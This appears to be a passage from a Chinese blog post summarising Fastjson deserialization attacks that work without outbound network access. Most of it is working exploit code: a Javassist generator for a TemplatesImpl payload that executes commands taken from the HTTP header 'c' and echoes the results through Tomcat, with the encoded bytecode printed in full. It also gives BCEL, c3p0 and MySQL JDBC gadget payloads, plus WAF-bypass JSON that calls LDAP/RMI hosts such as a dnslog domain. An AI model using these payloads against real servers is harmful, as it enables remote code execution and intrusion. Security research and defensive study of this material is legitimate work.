'_tfactory': {}, "_outputProperties": {}, "_name": "b", "_version": "1.0", "allowedProtocols": "all" }}
结合Tomcat回显
用到之前分析的java反序列化漏洞之回显
https://www.penson.top/article/av30#toc-heading-2
package com.fastjson不出网;import com.alibaba.fastjson.JSON;import com.alibaba.fastjson.parser.Feature;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import javassist.*;import org.apache.tomcat.util.codec.binary.Base64;public class TemplatesImpl { public static CtClass makeClass() throws CannotCompileException { ClassPool classPool = ClassPool.getDefault(); CtClass clazz = classPool.makeClass("com.summersec.x.Test" + System.nanoTime()); clazz.addConstructor(CtNewConstructor.make("public Test(){ Runtime.getRuntime().exec(\"calc.exe\");}",clazz)); return clazz; } public static CtClass genPayload(ClassPool pool) throws Exception { CtClass clazz = pool.makeClass("com.summersec.x.Test" + System.nanoTime()); if ((clazz.getDeclaredConstructors()).length != 0) { clazz.removeConstructor(clazz.getDeclaredConstructors()[0]); } //HTTPServletRequest.class //HTTPServletResponse.class clazz.addField(CtField.make("static java.util.HashSet/*<Object>*/ h;", clazz)); clazz.addField(CtField.make("static javax.servlet.http.HttpServletRequest r;",clazz)); clazz.addField(CtField.make("static javax.servlet.http.HttpServletResponse p;",clazz));// clazz.addField(CtField.make("static int depth ;",clazz)); clazz.addMethod(CtMethod.make("private static boolean i(Object obj){ if(obj==null|| h.contains(obj)){ return true; } h.add(obj); return false; }",clazz));// clazz.addMethod(CtMethod.make("private static void F(Object start, int depth){ Class n=start.getClass(); do{ java.lang.reflect.Field declaredField = null; java.lang.reflect.Field[] fields = n.getDeclaredFields(); int length = n.getDeclaredFields().length; for (int i =0 ; i <= length; i++){ declaredField = fields[i]; declaredField.setAccessible(true); Object o = null; try{ o = declaredField.get(start); if(!o.getClass().isArray()){ p(o,depth); }else{ Object[] array = (Object[])o; for (int q = 0; q < array.length; q++){ p(array[q], depth); } } }catch (Exception e){ } } }while( (n = n.getSuperclass())!=null ); }",clazz)); clazz.addMethod(CtMethod.make("private static void F(Object start, int depth){}",clazz)); clazz.addMethod(CtMethod.make(" private static void p(Object o, int depth){\n" + " if(depth > 52||(r !=null&& p !=null)){\n" + " return;\n" + " }\n" + " if(!i(o)){\n" + " if(r ==null&&javax.servlet.http.HttpServletRequest.class.isAssignableFrom(o.getClass())){\n" + " r = (javax.servlet.http.HttpServletRequest)o;\n" + " if(r.getHeader(\"Ctmd\")==null && r.getHeader(\"c\") == null) {\n" + " r = null;\n" + " }else{\n" + " try {\n" + " p = (javax.servlet.http.HttpServletResponse) r.getClass().getMethod(\"getResponse\",null).invoke(r,null);\n" + "\n" + " } catch (Exception e) {\n" + " r = null;\n" + " }\n" + " }\n" + "\n" + " }\n" + " if(r !=null&& p !=null){\n" + " try {\n" + " \n" + " if (r.getHeader(\"Ctmd\") != null) {\n" + " p.addHeader(\"techo\",r.getHeader(\"Ctmd\"));\n" + " }else {\n" + " p.getWriter().println(\"$$$\" + new java.util.Scanner(Runtime.getRuntime().exec(r.getHeader(\"c\")).getInputStream()).useDelimiter(\"\\\\A\").next() + \"$$$\");\n" + //" p.getWriter().println(\"$$$\" + org.apache.shiro.codec.Base64.encodeToString(new java.util.Scanner(Runtime.getRuntime().exec(org.apache.shiro.codec.Base64.decodeToString(r.getHeader(\"c\"))).getInputStream()).useDelimiter(\"\\\\A\").next().getBytes()) + \"$$$\");\n" + " p.getWriter().flush();\n" + " p.getWriter().close();\n" + " }\n" + " \n" + "\n" + " }catch (Exception e){\n" + " }\n" + " return;\n" + " }\n" + "\n" + " F(o,depth+1);\n" + " }\n" + " }",clazz)); clazz.getDeclaredMethod("F").setBody("{Class n = $1.getClass();\n" + " do{\n" + " java.lang.reflect.Field f = null;\n" + " int l = n.getDeclaredFields().length;\n" + " for (int i = 0; i < l; i++) {\n" + " f = n.getDeclaredFields()[i];\n" + " f.setAccessible(true);\n" + " Object o = null;\n" + " try{\n" + " o = f.get($1);\n" + "\n" + " if(!o.getClass().isArray()){\n" + " p(o,$2);\n" + " }else{\n" + " Object q = null;\n" + " Object[] objs = (Object[])o;\n"+ " int len = java.lang.reflect.Array.getLength(o);\n" + " for (int j = 0; j < len; j++) {\n" + " q = objs[j];\n"+ " p(q, $2);\n" + " }\n" + "\n" + " }\n" + "\n" + " }catch (Exception e){\n" + " }\n" + " }\n" + "\n" + " }while(\n" + " (n = n.getSuperclass())!=null\n" + " );}"); clazz.addConstructor(CtNewConstructor.make("public dfs(){ r = null; p = null; h =new java.util.HashSet/*<Object>*/(); F(Thread.currentThread(),0); }",clazz)); return clazz; } public static void main(String args[]) throws Exception { ClassPool aDefault = ClassPool.getDefault(); CtClass ctClass = genPayload(aDefault); ctClass.setSuperclass((aDefault.get(AbstractTranslet.class.getName()))); byte[] evilCode = ctClass.toBytecode(); String encode = Base64.encodeBase64String(evilCode); String json = "{" + " \"a\": {" + " \"@type\": \"java.lang.Class\"," + " \"val\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"" + " }," + " \"b\": {" + " \"@type\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"," + " \"_bytecodes\": [\""+encode+"\"]," + " '_name': 'a.b'," + " '_tfactory': {}," + " \"_outputProperties\": {}," + " \"_name\": \"b\"," + " \"_version\": \"1.0\"," + " \"allowedProtocols\": \"all\"" + " }" + "}"; System.out.println(json); JSON.parseObject(json, Object.class, Feature.SupportNonPublicField); }}
{ "a": { "@type": "java.lang.Class", "val": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" }, "b": { "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", "_bytecodes": ["yv66vgAAADQAuwEAIWNvbS9zdW1tZXJzZWMveC9UZXN0NDg0OTk0MDA5NDgwMAcAAQEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHAAMBAAFpAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAEQ29kZQEADVN0YWNrTWFwVGFibGUBAAFoAQATTGphdmEvdXRpbC9IYXNoU2V0OwwACQAKCQACAAsBABFqYXZhL3V0aWwvSGFzaFNldAcADQEACGNvbnRhaW5zDAAPAAYKAA4AEAEAA2FkZAwAEgAGCgAOABMBAAFGAQAWKExqYXZhL2xhbmcvT2JqZWN0O0kpVgEAE2phdmEvbGFuZy9FeGNlcHRpb24HABcBABBqYXZhL2xhbmcvT2JqZWN0BwAZAQAPamF2YS9sYW5nL0NsYXNzBwAbAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQHAB0BABNbTGphdmEvbGFuZy9PYmplY3Q7BwAfAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7DAAhACIKABoAIwEAEWdldERlY2xhcmVkRmllbGRzAQAcKClbTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwAJQAmCgAcACcBACJqYXZhL2xhbmcvcmVmbGVjdC9BY2Nlc3NpYmxlT2JqZWN0BwApAQANc2V0QWNjZXNzaWJsZQEABChaKVYMACsALAoAKgAtAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAC8AMAoAHgAxAQAHaXNBcnJheQEAAygpWgwAMwA0CgAcADUBAAFwDAA3ABYKAAIAOAEAF2phdmEvbGFuZy9yZWZsZWN0L0FycmF5BwA6AQAJZ2V0TGVuZ3RoAQAVKExqYXZhL2xhbmcvT2JqZWN0OylJDAA8AD0KADsAPgEADWdldFN1cGVyY2xhc3MMAEAAIgoAHABBAQABcgEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwwAQwBECQACAEUBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7DAA3AEcJAAIASAwABQAGCgACAEoBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0BwBMAQAQaXNBc3NpZ25hYmxlRnJvbQEAFChMamF2YS9sYW5nL0NsYXNzOylaDABOAE8KABwAUAEABEN0bWQIAFIBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwwAVABVCwBNAFYBAAFjCABYCwBNACMBAAtnZXRSZXNwb25zZQgAWwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAF0AXgoAHABfAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwBhAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABjAGQKAGIAZQEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlBwBnAQAFdGVjaG8IAGkBAAlhZGRIZWFkZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9TdHJpbmc7KVYMAGsAbAsAaABtAQAdamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2UHAG8BAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwwAcQByCwBwAHMBABZqYXZhL2xhbmcvU3RyaW5nQnVmZmVyBwB1AQAGPGluaXQ+AQADKClWDAB3AHgKAHYAeQEAAyQkJAgAewEABmFwcGVuZAEALChMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWZmZXI7DAB9AH4KAHYAfwEAEWphdmEvdXRpbC9TY2FubmVyBwCBAQARamF2YS9sYW5nL1J1bnRpbWUHAIMBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DACFAIYKAIQAhwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMAIkAigoAhACLAQARamF2YS9sYW5nL1Byb2Nlc3MHAI0BAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07DACPAJAKAI4AkQEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgwAdwCTCgCCAJQBAAJcQQgAlgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwwAmACZCgCCAJoBAARuZXh0AQAUKClMamF2YS9sYW5nL1N0cmluZzsMAJwAnQoAggCeAQAIdG9TdHJpbmcMAKAAnQoAdgChAQATamF2YS9pby9QcmludFdyaXRlcgcAowEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYMAKUApgoApACnAQAFZmx1c2gMAKkAeAoApACqAQAFY2xvc2UMAKwAeAoApACtDAAVABYKAAIArwoABAB5CgAOAHkBABBqYXZhL2xhbmcvVGhyZWFkBwCzAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7DAC1ALYKALQAtwEAClNvdXJjZUZpbGUBABZUZXN0NDg0OTk0MDA5NDgwMC5qYXZhACEAAgAEAAAAAwAIAAkACgAAAAgAQwBEAAAACAA3AEcAAAAEAAoABQAGAAEABwAAADEAAgABAAAAGyoBpQANsgAMKrYAEZkABQSssgAMKrYAFFcDrAAAAAEACAAAAAQAAg8BAAoAFQAWAAEABwAAAP4AAgAMAAAAiiq2ACRNAU4stgAovjYEAzYFFQUVBKIAaiy2ACgVBTJOLQS2AC4BOgYtKrYAMjoGGQa2ACS2ADaaAAwZBhu4ADmnADEBOgcZBsAAIDoIGQa4AD82CQM2ChUKFQmiABYZCBUKMjoHGQcbuAA5hAoBp//ppwAIOgunAAOEBQGn/5UstgBCWU0Bpv9/sQABACgAcQB0ABgAAQAIAAAAWgAI/wAFAAMHABoBBwAcAAD+AAsHAB4BAfwAMQcAGv8AEwALBwAaAQcAHAcAHgEBBwAaBwAaBwAgAQEAAP8AGQAHBwAaAQcAHAcAHgEBBwAaAABCBwAYBPoABQAKADcAFgABAAcAAAFwAAcABAAAASgbEDSjABSyAEYBpQAKsgBJAaYABqcABLEquABLmgELsgBGAaYADxJNKrYAJLYAUZoABqcAVirAAE2zAEayAEYSU7kAVwIAAaYAEbIARhJZuQBXAgABpQAGpwAKAbMARqcAKbIARrkAWgEAElwBtgBgsgBGAbYAZsAAaLMASacAC00BswBGpwADsgBGAaUACrIASQGmAAanAIqyAEYSU7kAVwIAAaUAGrIASRJqsgBGElO5AFcCALkAbgMApwBdsgBJuQB0AQC7AHZZtwB6Eny2AIC7AIJZuACIsgBGElm5AFcCALYAjLYAkrcAlRKXtgCbtgCftgCAEny2AIC2AKK2AKiyAEm5AHQBALYAq7IASbkAdAEAtgCupwAHTqcAA7EqGwRguACwsQACAGIAfQCAABgAmQEYARsAGAABAAgAAAAmABL/ABQAAgcAGgEAAAIAGQIiAgZdBwAYBw0CJPsAWUIHABgDAAYAAQB3AHgAAQAHAAAAKgACAAEAAAAeKrcAsQGzAEYBswBJuwAOWbcAsrMADLgAuAO4ALCxAAAAAAABALkAAAACALo="], '_name': 'a.b', '_tfactory': {}, "_outputProperties": {}, "_name": "b", "_version": "1.0", "allowedProtocols": "all" }}
org.apache.tomcat.dbcp.dbcp2.BasicDataSource
用到的是tomcat的依赖或者存在tomcat环境
<dependency> <groupId>org.apache.tomcat</groupId> <artifactId>tomcat-dbcp</artifactId> <version>9.0.8</version></dependency>
将恶意class文件生成BCEL格式(低版本环境运行)
exp
package com.fastjson不出网;import com.sun.org.apache.bcel.internal.classfile.Utility;import java.io.BufferedWriter;import java.io.FileWriter;import java.io.IOException;import java.nio.file.Files;import java.nio.file.Path;import java.nio.file.Paths;public class dbcp { public static void main(String[] args) throws IOException { Path path = Paths.get("F:\\网络安全\\java安全\\jndi_test\\src\\main\\java\\com\\learn\\exp\\Test.class"); byte[] bytes = Files.readAllBytes(path); System.out.println(bytes.length); String result = Utility.encode(bytes,true); BufferedWriter bw = new BufferedWriter(new FileWriter("F:\\网络安全\\java安全\\jndi_test\\src\\main\\java\\com\\fastjson不出网\\1.txt")); bw.write("$$BCEL$$" + result); bw.close(); }}
<=1.2.47
{ "a": { "@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" }, "b": { "@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader" }, "c": { "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": { "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader" }, "driverClassName": "###EVIL_CODE###" }}
但是这个用法只能在低版本的java里使用,并且条件还是挺苛刻的
如果是parseObject必须要为Object.class才有效,换到parse方法
看到p神的文章
https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html
p神给出了很好解释
c3p0反序列化配合cc链tomcat回显带入
由于c3p0覆盖面很广,所以这个还是很有用的,c3p0的链子分析网上有很多
以HexAsciiSerializedMap开头的字符串会自动进行解码并触发原生反序列化
package com.fastjson不出网;import com.alibaba.fastjson.JSON;import java.io.FileInputStream;import java.io.IOException;import java.io.InputStream;public class C3p0 { public static void main(String[] args) throws Exception { Allecho allecho = new Allecho(); byte[] payload = CommonsCollections2.echogenerate(allecho); String HexString = bytesToHexString(payload, payload.length); String poc = "{\"e\":{\"@type\":\"java.lang.Class\",\"val\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"},\"f\":{\"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\"userOverridesAsString\":\"HexAsciiSerializedMap:"+HexString+";\"}}"; System.out.println(poc);// JSON.parseObject(poc); } public static byte[] toByteArray(InputStream in) throws IOException { byte[] classBytes; classBytes = new byte[in.available()]; in.read(classBytes); in.close(); return classBytes; } public static String bytesToHexString(byte[] bArray, int length) { StringBuffer sb = new StringBuffer(length); for(int i = 0; i < length; ++i) { String sTemp = Integer.toHexString(255 & bArray[i]); if (sTemp.length() < 2) { sb.append(0); } sb.append(sTemp.toUpperCase()); } return sb.toString(); }}
{ "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "127.0.0.1", "portToConnectTo": 3306, "info": { "user": "CommonsCollections2", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" }, "databaseToConnectTo": "dbname", "url": "" } }
http://redteam.today/2020/04/18/c3p0%E7%9A%84%E4%B8%89%E4%B8%AAgadget/
https://github.com/depycode/fastjson-c3p0
Fastjson WAF 绕过
1、unicode编码
{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://t00ls.5cd37009d59fc2c7fc55f2bee57cafab.dnslog.cn/aaa","autoCommit":true}}
2、XCTF-校战“疫”中的ctf题目的一个payload:\x74
{"@\x74ype":"org.apache.commons.configuration.JNDIConfiguration","- prefix":"rmi://xxx.xxx"}
3、\b
{"@type":\b"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:9999","autoCommit":true}}
4、/**/
{"@type":/**/"Lcom.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":
裁缝怪到此结束,本篇主要是对大锅们的文章做一个总结
参考:
https://yinwc.github.io/2020/07/21/fastjsonlearn/
https://mp.weixin.qq.com/s/LZt-I3s0dQ_bK9ubEix8iQ